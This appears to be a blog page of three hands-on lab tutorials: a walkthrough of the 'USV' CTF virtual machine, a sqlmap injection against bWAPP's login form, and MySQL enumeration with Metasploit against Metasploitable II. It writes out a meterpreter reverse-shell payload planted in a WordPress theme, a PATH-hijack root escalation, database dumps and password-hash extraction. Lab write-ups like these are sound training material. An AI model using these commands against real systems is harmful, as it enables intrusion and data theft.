Hack the USV VM (CTF Challenge)

A new challenge for all of you guys!
This CTF is all about capturing the flags that come our way as we go further into the penetration testing of this lab. All the flags are in the form: Country name Flag:[md5 hash]. The network interface of this virtual machine takes its IP settings from DHCP.


Let’s get started with our first step.
netdiscover

From this we get our target IP.

Target IP: 192.168.0.103


Now we will scan it with nmap, which will give us all the open ports on this lab for further penetration testing.
nmap -p- -A 192.168.0.103
The result shows that ports 22, 80, 3129, 3306 and 21211 are open, and that an HTTP proxy is running on port 3129.


So now let's proceed with further penetration testing. Firstly we'll go with SSH on port 22.
ssh 192.168.0.103
SSH revealed an ASCII dragon with some strings and a base64 string written at the bottom. Looking closer you'll see something written on top: AES-ECB.


By Google search we found a website called aesencryption.net where we can decrypt the base64 string we got in our last result. So we decrypt that string with the key given in the image, and with all this we arrive at our 1st flag, i.e. the ITALY FLAG.


Ok, so now let's head towards the second flag, and for that we are going to open the target IP in the browser, as port 80 is also open. Look at that: access forbidden. No result.


While opening the target IP in the browser we simultaneously captured the request through Burp Suite, after setting a manual proxy in the browser. When that is done, right-click in the window where the intercepted data is shown, and from the action list that appears click “Send to Repeater”.

Look at the screenshot below: you will find two panels, left and right, for request and response respectively. In the response window the highlighted text is our flag.


As this is base64 encoded, we are going to use the HackBar plugin in Mozilla Firefox, which is either preinstalled or can be easily installed. Whoa, decoding the string in it we got another flag, our second flag, i.e. the CROATIA FLAG.


Moving ahead, from our nmap result we know that an HTTP proxy is set up on port 3129, so we will point the browser's proxy settings at our target IP with port 3129, as shown below.


Now try opening the target IP in the browser and wait a few seconds, like 10 sec. The proxy setting did the trick and the website reveals a single page with a changing banner of “WINTER IS COMING” and “ALL MEN MUST DIE”. Some of you may be aware of this, but for those who do not know: it is Game of Thrones.


The site didn't show much, so I used the nikto scanner through the proxy to get some information about it which will be helpful in further testing.
nikto -h 192.168.0.103 -useproxy http://192.168.0.103:3129
It reveals a WordPress login at /blog.


Ok! Now open it in the browser. Great, the Game of Thrones notion is confirmed, as a Seven Kingdoms blog is shown.
Scrolling down this site you can see an interesting second post which says ‘I have a message for you’. There is a highlighted link, so just try to open it in the browser.


Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.


Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at the bottom.


Here we decode the string in the HackBar plugin, which results in another flag. From this step we got our third flag, i.e. the PORTUGAL FLAG.


Now, returning to the previous site, there are several posts which are all useless, so just scroll down to see whether there is something useful or not, and then comes the last post, which is of interest to us:
‘Protected: the secret chapter‘


Oh! We have to provide a password to get through it. This one took some time, and to spare your time I won't go through my failures.
I created a dictionary of possible passwords, which are nothing but some of the words on this whole page, with the help of the following command.
cewl -d 2 -m 5 --proxy_host 192.168.0.103 --proxy_port 3129 -w /root/Desktop/dict.txt http://192.168.0.103/blog/


From the list we find that the password is ‘westerosi’.
Using this password we came to another page which revealed another flag as a base64 encoded string, and below it some images of an actress.


Now again decode it in HackBar, and as a result we have our fourth flag, i.e. the PARAGUAY FLAG.



Moving one level up, from the site we got another message: “the mother_of_dragons has a password which is in right front of your eyes”.
Knowing nothing about the eyes of the actress, I resorted to Google to see if I could get any clue from there, but no such luck.

I looked at the message again and it states ‘password which is in front of your eyes’.
That's it: the password of mother_of_dragons is ‘in front of your eyes’. But wait a minute, where is this password used?

We have an FTP service running, so let's try and get through it.
ftp 192.168.0.103 21211
ls -al
get .note.txt
exit
cat .note.txt

Bingo! Here that password is used. At the bottom, the result shows that the children's names are used for a password. Again a password, but this time it is used for the WordPress login, which we are going to use in the coming steps.


Again I googled and found out she didn't have any children but rather had 3 dragons named Drogon, Rhaegal and Viserion. So I put all these names into a file along with all possible combinations.
The list is small, so by entering each one the desired password could be found.
The password is RhaegalDrogonViserion.


Apply the credentials for WordPress and we are in!
Looking around the site I found the profile section, which reveals the base64 encoded string for mother_of_dragons.


Like always, decode the base64 string in HackBar and here we have another flag.
This is our fifth flag, i.e. the THAILAND FLAG.


Now, with only 2 flags left, it's time for shell access as we have WordPress.
Moving further, firstly make PHP code through msfvenom which can be used to get the meterpreter session.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw


Being admin of the site I am able to edit the theme. So I replaced the 404.php template of the Viking theme with the PHP code highlighted above.


On the other side, to get the meterpreter session, open a Kali terminal and run the multi handler. For that type the following commands (lhost is the attacker's IP, the same one given to msfvenom).
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 4444
exploit
As we have a meterpreter session, now go to shell and type the following commands to get a proper TTY.
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
cd /srv/http
ls
It shows a reward_flag.txt file, so read it with the cat command.
cat reward_flag.txt
As a result we get a base64 encoded string.


Do not worry, soon this decoding thing is going to be over, as we have the sixth flag with this decoding. So as a result our sixth flag is the MONGOLIA FLAG.


Back to another file in the above list of files, i.e. winterfell_messenger. We see it is executable and its owner is root. So run it with the following command.
./winterfell_messenger
cat: /root/message.txt
It shows that it is using the cat command to read a file in the /root directory.
Using strings shows that the cat command is being used; however, it is not using the full path to the program. From this we come to know that it will search the PATH to find cat.


Now, we are able to update the PATH by using export, but first we need a writable directory, and for that we have used /tmp. In /tmp we will create an executable file named cat so that it gets called by the winterfell_messenger program. This file will be running as root, so we put /bin/bash in it to spawn a shell, and change its mode. Run the following commands.
echo "/bin/bash" > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
After this step we are going to update the PATH to put the /tmp directory we prepared at the front, so it is searched first. For this type the following command.
export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
Now, we will go to the home directory of http to get the desired file. For that type
cd /srv/http
ls
Now call the winterfell_messenger file by using the given command.
./winterfell_messenger
id
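The weakness behind winterfell_messenger is a root-owned program that runs cat through a PATH lookup. As an added example (not code from the original write-up or from the VM's author), here is that pattern beside a hardened version; `/bin/cat` as the trusted binary, the fixed PATH and the function names are assumptions, since the binary's source is not on the page.

```c
/* Added example, not the original binary's source. A privileged program that
 * runs "cat" through PATH lets whoever controls PATH choose which cat runs.
 * Assumed: /bin/cat is the trusted binary; the function names are invented. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern (as the page describes): system() hands the string to
 * /bin/sh, which resolves "cat" via the caller's PATH, so /tmp/cat wins. */
int read_message_vulnerable(void)
{
    return system("cat /root/message.txt");
}

/* Code-review check: an argv[0] without a '/' is resolved through PATH. */
int resolved_via_path(const char *argv0)
{
    return strchr(argv0, '/') == NULL;
}

/* Hardened: absolute binary path, a fixed PATH, and fork/execve instead of a
 * shell, so the calling environment cannot redirect the lookup.
 * Returns the child's exit status, or -1 on fork/wait failure. */
int read_message_hardened(const char *path)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "/bin/cat", (char *)path, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve("/bin/cat", argv, envp);
        _exit(127); /* only reached if execve itself failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    printf("\"cat\" resolved via PATH: %d\n", resolved_via_path("cat"));
    printf("\"/bin/cat\" resolved via PATH: %d\n", resolved_via_path("/bin/cat"));
    printf("hardened read of /etc/hostname exited %d\n",
           read_message_hardened("/etc/hostname"));
    return 0;
}
```

A real SUID program should additionally drop privileges it does not need before executing anything.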


Now go to /root, and there we have the .flag.txt file.
Running cat against .flag.txt we get a congratulations, a wolf made up of ASCII characters and a base64 encoded string at the bottom. The commands are given below (using the full path, since /tmp/cat now shadows cat in our PATH).
cd /root
/usr/sbin/cat .flag.txt


Finally, decoding in HackBar reveals the seventh and last flag, which is nothing but the SOMALIA FLAG.


Voila! We reached the end, and with this the job is done. Hope you enjoyed it, and obviously your penetration testing skills are refreshed.

Exploiting Form Based Sql Injection using Sqlmap

In this tutorial you will come across how to perform a SQL injection attack on the login form of a website. There are so many examples of login forms, like Facebook login, Gmail login and other online accounts which ask you to submit your information as username and password and then permit you to log in to your account on that web server. Here we are going to perform a SQL injection attack on the login form of a vulnerable web application and then fetch the information present inside its database.

Let's Begin!!!
Requirement:
Xampp/Wamp Server
bWAPP Lab
Kali Linux: Burp suite, sqlmap tool

Firstly you need to install the bWAPP lab in your XAMPP or WAMP server (read the full article for that here), then open bWAPP on your PC and log in with the credentials given below.

Let’s begin!!!

Start the Apache and MySQL services in the XAMPP or WAMP server. Let's open the localhost address in the browser; I am using 192.168.1.102:81/bWAPP/login.php. Enter bee and bug as user and password respectively.


Set the security level to low, choose your bug from the list box, select SQL Injection (Login Form/Hero) and click on Hack.


A login form opens which asks us to submit the credentials of a superhero, which we don't know. So I am going to give a random login and password like iron:man, in order to capture the request through Burp Suite.


To capture the request of bWAPP, click on the Proxy tab, then click the “Intercept is on” button, come back to bWAPP and click login. Use the highlighted intercepted data in the sqlmap commands.


Now open the terminal of your Kali Linux and type the following command to enumerate the database names.
sqlmap -u http://192.168.1.102:81/bWAPP/sqli_3.php --data="login=iron&password=man&form=submit" --method POST --dbs --batch


From the enumeration result we get that the back-end database management system is MySQL 5.5, and that the web server operating system is Windows with Apache 2.4.7 and PHP 5.5.9, and it fetches all names of the databases. So if you notice the image given below, we have caught all the database names. Choose any name for fetching more details.


Now type the below command, which will try to fetch the entire data from inside the bwapp database.
sqlmap -u http://192.168.1.102:81/bWAPP/sqli_3.php --data="login=iron&password=man&form=submit" --method POST -D bwapp --dump --batch


First I found a table “BLOG” which contains four columns, but this table appears to be empty, as all fields are left blank.


Next I found the table “MOVIES” in the database bwapp, and you can see from the given screenshot that it contains movie details. There are 10 entries in each of the following columns.


Luckily!!! I have got data which contains id, login, password and secret entries inside the “HEROES” table, and maybe this dumped data can help me to bypass the login page of the web page which we have opened in the browser. I will use the login and password later to verify it.


Here I found only three entries for the table “USERS” inside bwapp, which also contains the credentials for the admin account.


Another empty table, “VISITORS”; like the “blog” table, it is also left blank.

Sqlmap has dumped a lot of data from inside the database of bwapp; as you have seen, I have got data from different tables. Now let's verify this result. Browse bwapp on localhost again and once again open the login form page inside bWAPP.


If you remember, sqlmap dumped the table “HEROES” which contains logins and passwords. Now, using the data fetched above (thor:Asgard) from inside the table “heroes”, I will use these credentials to log in.
Type thor in the text field given for login and then type Asgard as the password. Click on login.


Congrats!!! We got a successful login and you can read the secret given for thor, which is exactly the same as inside the “heroes” table.

Conclusion: Through this article we have learnt how to perform an attack on the login form of a web site and retrieve data from inside its database.


Beginner Guide of mysql Penetration Testing

In this article we are going to perform penetration testing on a MySQL server; here we will perform the attack through the Metasploit framework.

Attacker: kali Linux
Target: metasploitable II

Let's Begin!!

192.168.1.103 is our target IP. Firstly type the nmap command to scan the target IP to make sure whether the MySQL service is running on the host or not. Here you can see port 3306 is open for the MySQL service.

nmap -sV 192.168.1.103


Now start Metasploit by typing the following command in the Kali terminal

msfconsole

This module enumerates the version of MySQL servers.

msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set rhosts 192.168.1.103
msf auxiliary(mysql_version) > set rport 3306
msf auxiliary(mysql_version) > exploit

Here it shows the MySQL version is 5.0.51a-3ubuntu5, and if you noticed, we got the same result from the nmap version scan.


This module simply queries the MySQL instance for a specific user/pass (the default is root with a blank password).

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.103
msf auxiliary(mysql_login) > set rport 3306
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > exploit


Here we got a successful result as root, which does not require any password for login into the MySQL server.


This module allows simple enumeration of a MySQL Database Server, provided proper credentials to connect remotely.

msf > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > set rhost 192.168.1.103
msf auxiliary(mysql_enum) > set username root
msf auxiliary(mysql_enum) > exploit


This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

msf > use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.103
msf auxiliary(mysql_hashdump) > set username root
msf auxiliary(mysql_hashdump) > exploit

Now from the screenshot you can read the password hashes for the users.


Now we have enumerated much information with the help of Metasploit; now let's try to connect to the MySQL server in order to dump its data. Type the following command in the terminal
mysql -h 192.168.1.103 -u root -p
Hit enter at the password prompt; here we got access to the MySQL server, and now I am going to fetch its data.


mysql> show databases;
It has shown all the database names present inside it. Let's check the tables inside dvwa.
mysql> show tables from dvwa;


Let's fetch the data inside the dvwa database; now type the following command.
mysql> use dvwa;
Now we can fetch the data present inside the database dvwa.
mysql> show tables;


mysql> select * from users;
Now you can see I have got all the user names with their password hashes.
Try it yourself for the other databases' details.